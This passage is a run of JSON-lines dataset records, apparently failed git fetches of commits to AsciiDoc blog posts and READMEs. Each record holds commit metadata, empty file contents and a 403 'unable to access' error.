URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"49a338c72c838e51cf16195088ca2924de3e5bca","subject":"Update 2015-06-18-Mein-freiwilliges-politisches-Jahr-Teil-1.adoc","message":"Update 2015-06-18-Mein-freiwilliges-politisches-Jahr-Teil-1.adoc","repos":"hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io","old_file":"_posts\/2015-06-18-Mein-freiwilliges-politisches-Jahr-Teil-1.adoc","new_file":"_posts\/2015-06-18-Mein-freiwilliges-politisches-Jahr-Teil-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hoernschen\/hoernschen.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5a55811f980acf877ec9f8e7215e773b6f516e65","subject":"Create 2015-12-14-treat-your-pom-the-same-as-your-java-code.adoc","message":"Create 2015-12-14-treat-your-pom-the-same-as-your-java-code.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2015-12-14-treat-your-pom-the-same-as-your-java-code.adoc","new_file":"_posts\/2015-12-14-treat-your-pom-the-same-as-your-java-code.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"83c2a4839b9a56defab4df713c937180d22c8013","subject":"Add Clojure\/north 2020","message":"Add Clojure\/north 2020","repos":"clojure\/clojure-site","old_file":"content\/events\/2020\/clojurenorth.adoc","new_file":"content\/events\/2020\/clojurenorth.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"2f4ba7051d794e3dc479c71572c65d7629420e13","subject":"Added some documentation.","message":"Added some documentation.\n","repos":"apache\/flex-blazeds","old_file":"opt\/blazeds-spring-boot-starter\/README.adoc","new_file":"opt\/blazeds-spring-boot-starter\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apache\/flex-blazeds.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8b6877948c208de299e79d4f86533cbf634a772f","subject":"Update 2013-10-15-Wolf-and-hunter.adoc","message":"Update 2013-10-15-Wolf-and-hunter.adoc","repos":"arseniuss\/blog.arseniuss.id.lv,arseniuss\/blog.arseniuss.id.lv,arseniuss\/blog.arseniuss.id.lv,arseniuss\/blog.arseniuss.id.lv","old_file":"_posts\/2013-10-15-Wolf-and-hunter.adoc","new_file":"_posts\/2013-10-15-Wolf-and-hunter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/arseniuss\/blog.arseniuss.id.lv.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2ee19db9a15498a5c84037b05a57389f4dd3f24d","subject":"Update 2016-07-16-Mi-segundo-blog.adoc","message":"Update 
2016-07-16-Mi-segundo-blog.adoc","repos":"txemis\/txemis.github.io,txemis\/txemis.github.io,txemis\/txemis.github.io,txemis\/txemis.github.io,txemis\/txemis.github.io","old_file":"_posts\/2016-07-16-Mi-segundo-blog.adoc","new_file":"_posts\/2016-07-16-Mi-segundo-blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/txemis\/txemis.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b915c6f23910660c165d1361048138292cdc32d9","subject":"Update 2015-10-27-Episode-27-If-It-Walks-Like-A-Duck-Its-Pinball.adoc","message":"Update 2015-10-27-Episode-27-If-It-Walks-Like-A-Duck-Its-Pinball.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2015-10-27-Episode-27-If-It-Walks-Like-A-Duck-Its-Pinball.adoc","new_file":"_posts\/2015-10-27-Episode-27-If-It-Walks-Like-A-Duck-Its-Pinball.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7001b0692d91e137db20d04ffefdd5f4db65cd56","subject":"Update 2017-01-01-Ngedrift-di-Sonic-All-Stars-Racing-Transformed.adoc","message":"Update 2017-01-01-Ngedrift-di-Sonic-All-Stars-Racing-Transformed.adoc","repos":"lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io","old_file":"_posts\/2017-01-01-Ngedrift-di-Sonic-All-Stars-Racing-Transformed.adoc","new_file":"_posts\/2017-01-01-Ngedrift-di-Sonic-All-Stars-Racing-Transformed.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lovian\/lovian.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b2933075871bcde3fa6c422942467064dd82c0c4","subject":"Common Snippet App engine deploy","message":"Common Snippet App engine deploy\n","repos":"grails\/grails-guides,grails\/grails-guides,grails\/grails-guides","old_file":"src\/main\/docs\/common-appenginedeploy.adoc","new_file":"src\/main\/docs\/common-appenginedeploy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grails\/grails-guides.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"59a022431b8de10faf2ec7947db1d8493d74e3f3","subject":"Add 1.1 Dresden release announcement","message":"Add 1.1 Dresden release announcement\n","repos":"raelik\/jruby-gradle-plugin,MisumiRize\/jruby-gradle-plugin,MisumiRize\/jruby-gradle-plugin,jamescway\/jruby-gradle-plugin,MisumiRize\/jruby-gradle-plugin,raelik\/jruby-gradle-plugin,jamescway\/jruby-gradle-plugin,raelik\/jruby-gradle-plugin,jamescway\/jruby-gradle-plugin","old_file":"docs\/news\/2015-09-18-jruby-gradle-1-1.adoc","new_file":"docs\/news\/2015-09-18-jruby-gradle-1-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/raelik\/jruby-gradle-plugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dd37de6a43b5451709502be38ac2d34aa31cc5e3","subject":"Publish 2016-6-26-PHRER-array-merge.adoc","message":"Publish 
2016-6-26-PHRER-array-merge.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-26-PHRER-array-merge.adoc","new_file":"2016-6-26-PHRER-array-merge.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"885d90ca564852ff30560edb565cc686c34ef3ec","subject":"Update 2017-02-14-Hey-this-is-my-blog.adoc","message":"Update 2017-02-14-Hey-this-is-my-blog.adoc","repos":"jsiu22\/blog,jsiu22\/blog,jsiu22\/blog,jsiu22\/blog","old_file":"_posts\/2017-02-14-Hey-this-is-my-blog.adoc","new_file":"_posts\/2017-02-14-Hey-this-is-my-blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsiu22\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"932db6c966514440e142328ae32a6d46ba178159","subject":"Update 2019-02-14-Google-Spread-Sheet.adoc","message":"Update 2019-02-14-Google-Spread-Sheet.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-14-Google-Spread-Sheet.adoc","new_file":"_posts\/2019-02-14-Google-Spread-Sheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"82b17cc95e65973348065499235885cff0cf4648","subject":"Update 2019-08-18-The-Ideal-Situation.adoc","message":"Update 2019-08-18-The-Ideal-Situation.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2019-08-18-The-Ideal-Situation.adoc","new_file":"_posts\/2019-08-18-The-Ideal-Situation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bcf06a57e91d22e1789bd4ebc597c1474a2d2c19","subject":"Update 2015-10-12-DIY-Origins-of-the-Luftwaffe.adoc","message":"Update 2015-10-12-DIY-Origins-of-the-Luftwaffe.adoc","repos":"Cribstone\/humblehacker,Cribstone\/humblehacker,Cribstone\/humblehacker","old_file":"_posts\/2015-10-12-DIY-Origins-of-the-Luftwaffe.adoc","new_file":"_posts\/2015-10-12-DIY-Origins-of-the-Luftwaffe.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Cribstone\/humblehacker.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8fc0e8787666a10eecbc66344516b5bf4c4ccfc6","subject":"Update 2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","message":"Update 2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","new_file":"_posts\/2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a03593d5deb3dded464de94176447b6943826f62","subject":"Update 2017-09-10-nativescript-and-wordpress-rest-api.adoc","message":"Update 2017-09-10-nativescript-and-wordpress-rest-api.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-10-nativescript-and-wordpress-rest-api.adoc","new_file":"_posts\/2017-09-10-nativescript-and-wordpress-rest-api.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f82dc0029c03cab5c90dcdb0f5375fa8f566a009","subject":"Update 2016-02-02-Next-idea.adoc","message":"Update 2016-02-02-Next-idea.adoc","repos":"alexbleasdale\/alexbleasdale.github.io,alexbleasdale\/alexbleasdale.github.io,alexbleasdale\/alexbleasdale.github.io","old_file":"_posts\/2016-02-02-Next-idea.adoc","new_file":"_posts\/2016-02-02-Next-idea.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alexbleasdale\/alexbleasdale.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8e437aacd86691c929ffb1fddfbea891f7c0cc25","subject":"Create Kill-Bill-Glossary.adoc","message":"Create Kill-Bill-Glossary.adoc","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/glossary\/Kill-Bill-Glossary.adoc","new_file":"userguide\/glossary\/Kill-Bill-Glossary.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1f4a1748d0d3cd747b99ca52918dee41ce7a192c","subject":"Update 2016-07-03-Test-Post.adoc","message":"Update 2016-07-03-Test-Post.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2016-07-03-Test-Post.adoc","new_file":"_posts\/2016-07-03-Test-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3695c0fdfda415311e60f81ae7645f88c6a106de","subject":"added examples for refactorings","message":"added examples for refactorings\n","repos":"moley\/leguan,moley\/leguan,moley\/leguan,moley\/leguan,moley\/leguan","old_file":"leguan-base\/src\/main\/docs\/overview.adoc","new_file":"leguan-base\/src\/main\/docs\/overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/moley\/leguan.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b31468be464d12a9e32228e585d4933c63b1924c","subject":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","message":"Update 
2015-05-30-My-Asyncjs-Cheatsheet.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8fcdf915c839b4ec865f9b866c68fd5d771543fe","subject":"Update 2014-08-03-Getting-pull-request-and-sonar-playing-toghetter.adoc","message":"Update 2014-08-03-Getting-pull-request-and-sonar-playing-toghetter.adoc","repos":"velo\/velo.github.io,velo\/velo.github.io,velo\/velo.github.io,velo\/velo.github.io","old_file":"_posts\/2014-08-03-Getting-pull-request-and-sonar-playing-toghetter.adoc","new_file":"_posts\/2014-08-03-Getting-pull-request-and-sonar-playing-toghetter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/velo\/velo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e6a948969aa37b533503b3cb40958c093b61b2bc","subject":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","message":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","repos":"JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io","old_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/JithinPavithran\/JithinPavithran.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cd11f0570c22583b98187c024b01abe19406343c","subject":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","message":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","repos":"JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io","old_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/JithinPavithran\/JithinPavithran.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"731e120104641ce984400298bad485e4bb776c3a","subject":"Update 2015-06-08-A-remplacer.adoc","message":"Update 2015-06-08-A-remplacer.adoc","repos":"Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io","old_file":"_posts\/2015-06-08-A-remplacer.adoc","new_file":"_posts\/2015-06-08-A-remplacer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ellixo\/ellixo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"061a68849165f50f1f384709aef2f1656fbfb084","subject":"Update 2015-08-03-Hello-World.adoc","message":"Update 
2015-08-03-Hello-World.adoc","repos":"prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io","old_file":"_posts\/2015-08-03-Hello-World.adoc","new_file":"_posts\/2015-08-03-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateekjadhwani\/prateekjadhwani.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3ffb67de42686550ec20795e6d02f7d2e62ebacd","subject":"Update 2016-09-01-Swift-Tuple.adoc","message":"Update 2016-09-01-Swift-Tuple.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-01-Swift-Tuple.adoc","new_file":"_posts\/2016-09-01-Swift-Tuple.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8f0f12b919a3f79ca313ed3c24bda93b6563a049","subject":"Update 2019-02-28-Normscharfe.adoc","message":"Update 2019-02-28-Normscharfe.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2019-02-28-Normscharfe.adoc","new_file":"_posts\/2019-02-28-Normscharfe.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4e9ddb42525677d7cb85577bea049d94955afeb7","subject":"Update 2015-06-30-FW4SPL-on-the-roads.adoc","message":"Update 2015-06-30-FW4SPL-on-the-roads.adoc","repos":"fw4spl-org\/fw4spl-blog,fw4spl-org\/fw4spl-blog,fw4spl-org\/fw4spl-blog","old_file":"_posts\/2015-06-30-FW4SPL-on-the-roads.adoc","new_file":"_posts\/2015-06-30-FW4SPL-on-the-roads.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fw4spl-org\/fw4spl-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ff5c506b68da3bab2a87f526f2140d58e2c70d5f","subject":"Update 2018-04-13-deploy-by-kubernetes.adoc","message":"Update 2018-04-13-deploy-by-kubernetes.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-04-13-deploy-by-kubernetes.adoc","new_file":"_posts\/2018-04-13-deploy-by-kubernetes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eefa11d6308a7518c75801f8b85b120465212414","subject":"Update 2016-03-10-Grand-Central-Dispatch-i-O-S.adoc","message":"Update 
2016-03-10-Grand-Central-Dispatch-i-O-S.adoc","repos":"jtsiros\/jtsiros.github.io,jtsiros\/jtsiros.github.io,jtsiros\/jtsiros.github.io,jtsiros\/jtsiros.github.io","old_file":"_posts\/2016-03-10-Grand-Central-Dispatch-i-O-S.adoc","new_file":"_posts\/2016-03-10-Grand-Central-Dispatch-i-O-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jtsiros\/jtsiros.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2cbaa579f6331dab827044179f268f94bcd28eb2","subject":"Update 2017-04-02-Confidence-CTF-Public-Key-Infrastructure-400.adoc","message":"Update 2017-04-02-Confidence-CTF-Public-Key-Infrastructure-400.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2017-04-02-Confidence-CTF-Public-Key-Infrastructure-400.adoc","new_file":"_posts\/2017-04-02-Confidence-CTF-Public-Key-Infrastructure-400.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eb16c66aab56d715aa4739fe35f5ee13de17fdd8","subject":"Update 2017-02-03-Azure-Machine-Learning-2.adoc","message":"Update 2017-02-03-Azure-Machine-Learning-2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-03-Azure-Machine-Learning-2.adoc","new_file":"_posts\/2017-02-03-Azure-Machine-Learning-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0e7854d816f069575006c95d5ecb8ab02acd15a2","subject":"Update 2017-02-03-Azure-Machine-Learning-2.adoc","message":"Update 2017-02-03-Azure-Machine-Learning-2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-03-Azure-Machine-Learning-2.adoc","new_file":"_posts\/2017-02-03-Azure-Machine-Learning-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d6ca0d1b1157971134bb180d36ccdd6ca30606af","subject":"Restore old image","message":"Restore old image\n","repos":"LFUnion\/left,LFUnion\/left,LFUnion\/left,LFUnion\/left","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LFUnion\/left.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fa43b6b770ccb1c608ebc475c384af422604ac13","subject":"Add readme","message":"Add readme\n","repos":"thee-l\/notetaking,thee-l\/notetaking,lukesanantonio\/notetaking,lukesanantonio\/notetaking","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thee-l\/notetaking.git\/': The requested URL returned error: 
403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"077cc5b256cdbb50e5dbcf9cc8ab717c10b751ca","subject":"Fixed broken SmartImage infos","message":"Fixed broken SmartImage infos\n","repos":"LFUnion\/left,LFUnion\/left,LFUnion\/left,LFUnion\/left","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LFUnion\/left.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"50eabebfff5553a38b6895912d66c28324590d38","subject":"Added maven bage","message":"Added maven bage\n","repos":"rmuhamedgaliev\/JPS,rmuhamedgaliev\/JPS","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rmuhamedgaliev\/JPS.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4183eae9f83f95e9b90e05860ab7312710d87697","subject":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","message":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"91411ce32b2a6e176a62e9eed70685cbe8df475b","subject":"Update 2016-04-03-etat-limite-borderline.adoc","message":"Update 2016-04-03-etat-limite-borderline.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-04-03-etat-limite-borderline.adoc","new_file":"_posts\/2016-04-03-etat-limite-borderline.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"05da67d1d23e4e7613367271af35cefd4c20a45d","subject":"Update 2016-04-04-Chairpersons-Chinwag.adoc","message":"Update 2016-04-04-Chairpersons-Chinwag.adoc","repos":"Perthmastersswimming\/hubpress.io,Perthmastersswimming\/hubpress.io,Perthmastersswimming\/hubpress.io,Perthmastersswimming\/hubpress.io","old_file":"_posts\/2016-04-04-Chairpersons-Chinwag.adoc","new_file":"_posts\/2016-04-04-Chairpersons-Chinwag.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Perthmastersswimming\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5ce35dbadbd59e5e59621f281af9801a9a75e557","subject":"first version of the introduction chapter","message":"first version of the introduction chapter\n","repos":"BenFradet\/spark-ml","old_file":"intro.adoc","new_file":"intro.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/BenFradet\/spark-ml.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"67e997b42975a0e7edc75857694da3c6f305ce07","subject":"Update 2016-11-22-Test-Post.adoc","message":"Update 
2016-11-22-Test-Post.adoc","repos":"Imran31\/imran31.github.io","old_file":"_posts\/2016-11-22-Test-Post.adoc","new_file":"_posts\/2016-11-22-Test-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Imran31\/imran31.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"881ff8c052c7b22fc45a7d1d6cfcc3a61568c61c","subject":"Update 2016-12-23-Larastudy.adoc","message":"Update 2016-12-23-Larastudy.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-23-Larastudy.adoc","new_file":"_posts\/2016-12-23-Larastudy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e58988b1f59dc182c5b59d3bd37c909b083cf1be","subject":"Update 2016-08-10-Test-post-2.adoc","message":"Update 2016-08-10-Test-post-2.adoc","repos":"matthardwick\/hubpress.io,matthardwick\/hubpress.io,matthardwick\/hubpress.io,matthardwick\/hubpress.io","old_file":"_posts\/2016-08-10-Test-post-2.adoc","new_file":"_posts\/2016-08-10-Test-post-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/matthardwick\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"af002a6a4e7ee71bd582dda68c0835f9ac9ead1a","subject":"Update 2017-10-16-Danphe-BaaS.adoc","message":"Update 2017-10-16-Danphe-BaaS.adoc","repos":"Nepal-Blockchain\/danphe-blogs,Nepal-Blockchain\/danphe-blogs,Nepal-Blockchain\/danphe-blogs,Nepal-Blockchain\/danphe-blogs","old_file":"_posts\/2017-10-16-Danphe-BaaS.adoc","new_file":"_posts\/2017-10-16-Danphe-BaaS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Nepal-Blockchain\/danphe-blogs.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 